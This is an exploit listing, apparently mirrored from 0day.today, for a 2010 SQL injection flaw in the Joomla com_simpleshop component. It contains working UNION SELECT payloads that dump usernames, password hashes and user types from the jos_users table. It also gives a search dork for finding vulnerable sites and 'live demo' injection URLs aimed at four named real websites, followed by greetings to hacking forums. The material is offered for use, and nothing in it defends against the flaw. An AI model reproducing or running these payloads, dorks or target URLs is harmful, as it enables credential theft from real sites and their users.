Joomla Component com_simpleshop SQL injection Vulnerability

🗓️ 17 Apr 2010 00:00:00Reported by Sudden_deathType
zdt🔗 0day.today👁 45 Views
Joomla com_simpleshop SQL Injection Vulnerabilit
===========================================================
Joomla Component com_simpleshop SQL injection Vulnerability 
===========================================================

# Exploit Title     : joomla component simpleshop SQL injection Vulnerability
# Date              : 17 april 2010
# Author            : Sudden_death ([email protected])
# Software Link     : N/A
# Platform/Tested on: Windows XP 2 SP 2
# myweb             : http://suddendeath.000space.com/
# dork              : inurl:option=com_simpleshop
# Code                 : -1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
======================================================================
 
# EXPLOIT / c0de

-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
 
 
# VULN IN HERE
 
http://localhost/joomla/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=[c0de}
 
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]
 
[SQL]:
 
id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
 
Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- 
 
# LIVE DEMO
 
http://restrive.co.za/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://www.textusllc.com/site/index.php?option=com_simpleshop&task=browse&Itemid=92&catid=-3%20UNION%20SELECT%201,username,3,4,password,6,7,8%20from%20jos_users--
http://www.dpisb.com/cms/index.php?option=com_simpleshop&task=browse&Itemid=115&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://gfhomebrewing.com.au/index.php?option=com_simpleshop&task=browse&Itemid=31&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
 
[#]-------------------------------------------------------------------
 
GREETZ TO WE FORUM:
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ]
 
[#]-------------------------------------------------------------------
 
MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |
 
[#]-------------------------------------------------------------------
 
note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!



#  0day.today [2018-04-08]  #
17 Apr 2010 00:00Current
7.1High risk
Vulners AI Score7.1